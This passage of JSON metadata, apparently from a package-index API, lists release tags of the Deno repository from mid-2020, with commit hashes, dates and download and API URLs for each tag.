23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/deno